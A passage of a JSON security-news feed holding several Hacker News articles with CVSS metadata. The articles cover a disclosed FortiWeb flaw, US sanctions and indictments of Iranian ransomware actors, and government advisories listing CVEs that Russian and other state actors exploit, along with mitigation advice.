compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T03:41:00", "type": "thn", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T06:50:20", "id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "href": "https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e100/iranian-hackers.jpg>)\n\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) has revealed the group's connections to two companies Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core &amp; Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): 